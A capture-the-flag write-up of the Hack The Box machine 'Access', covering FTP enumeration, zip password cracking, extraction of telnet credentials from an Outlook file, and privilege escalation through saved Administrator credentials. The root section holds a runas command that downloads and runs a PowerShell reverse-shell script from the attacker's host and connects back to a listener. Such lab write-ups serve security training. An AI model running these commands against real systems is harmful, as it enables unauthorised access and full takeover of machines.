Access machine is running FTP which has password protected zip file that eventually lead to the telnet credentials.

The machine has Administrator stored credentials that leads then to Privilege Escalation.

Part one: User

Reconnaissance

Begin with a nmap scan to find open ports.

command:
-sC for default scripts
-sV for enumerate versions
-oNto save in the scan in normal format

nmap -sC -sV -oN access 10.10.10.98

Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 10.10.10.98
Host is up (0.072s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: MegaCorp
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 185.52 seconds
  • port 21 (ftp) — Nmap scripts indicates it is possible to login anonymously.
  • port 23 (telnet)
  • port 80 (http) — Running a Microsoft IIS server.

HTTP — Port 80

The website:

The website is serving a network camera but seems like a static image.

Tried to find any other directories using gobuster :

Nothing interesting.

FTP — Port 21

Connecting anonymously without password:

ftp [email protected]

Searching for interesting files and transfer them to my machine:

ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
08-23-18  08:16PM       <DIR>          Backups
08-24-18  09:00PM       <DIR>          Engineer
226 Transfer complete.
ftp> cd Engineer
250 CWD command successful.
ftp> ls
200 EPRT command successful.
125 Data connection already open; Transfer starting.
08-24-18  12:16AM                10870 Access Control.zip
226 Transfer complete.
ftp> get Access\ Control.zip
local: Access Control.zip remote: Access Control.zip
200 EPRT command successful.
150 Opening ASCII mode data connection.
100% |************************************************************************************************************************************************| 10870       50.67 KiB/s    00:00 ETA
226 Transfer complete.

Found two files:

  • backup.mdb
  • Access Control.zip

A file with the MDB file extension is a Microsoft Access database file that literally stands for Microsoft Database.

Trying to unzip the zip archive:

unzip Access\ Control.zip

Archive:  Access Control.zip
   skipping: Access Control.pst      unsupported compression method 99

After searching about “unsupported compression method 99”:

Winzip program uses AES encryption method to make zip file password protected which is not supported by unzip binary. (source)

However, it is possible to use 7zip package to extract the files from winzip

7z x Access\ Control.zip

Enter password (will not be echoed):

The zip is protected so used zip2john in order to crack it offline.

zip2john Access\ Control.zip > zip.hash

Attempted to crack it using rockyou.txt:

john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt

Failed.

So although, I got only part of the backup.mdb file, I extracted the strings in order to use them as wordlist and hopefully crack the winzip password:

strings backup.mdb > zip_wordlist

It worked!
the password for the zip is access4u@security.

Extracting the zip file using 7z:

7z x Access\ Control.zip

Getting information about the extracted file using the file command:

file Access\ Control.pst

Access Control.pst: Microsoft Outlook Personal Storage (>=2003, Unicode, version 23), dwReserved1=0x234, dwReserved2=0x22f3a, bidUnused=0000000000000000, dwUnique=0x39, 271360 bytes, bCryptMethod=1, CRC32 0x744a1e2e

PST extension is used for Outlook storage.

Using readpst in order to transfer it into mbox file so I can read the contents:

readpst Access\ Control.pst

file Access\ Control.mbox
Access Control.mbox: HTML document, Unicode text, UTF-8 text, with very long lines (516)

“Access Control.mbox” is now readable file.

cat Access\ Control.mbox | grep password

Got credentials lets check it using telnet security:4Cc3ssC0ntr0ller.

Telnet — Port 23

Owned user!

Part two: Root

Reconnaissance

After enumerating basic information found that Administrator credentials are stored.

Using runas /savecred is possible to run commands behalf the Administrator without using password.

That it can be leveraged it to create a reversed shell

Reverse shell

For the reversed shell I used nishang collection and used Invoke-PowerShellTcp.ps1

I downloaded the ps1 script and served it using python.

python3 -m http.server 8000

Started listening on 4445 using nc:

nc -lvnp 4445

Used runas to execute behalf of Administrator to download and execute the Invoke-PowerShellTcp.ps1 script and connect to the my local port:

runas /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object net.webclient).downloadstring('http://10.10.14.20:8000/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.20 -Port 4445"

Checking the call back on the nc window:

Got shell as Administrator!

Thanks for reading :)

References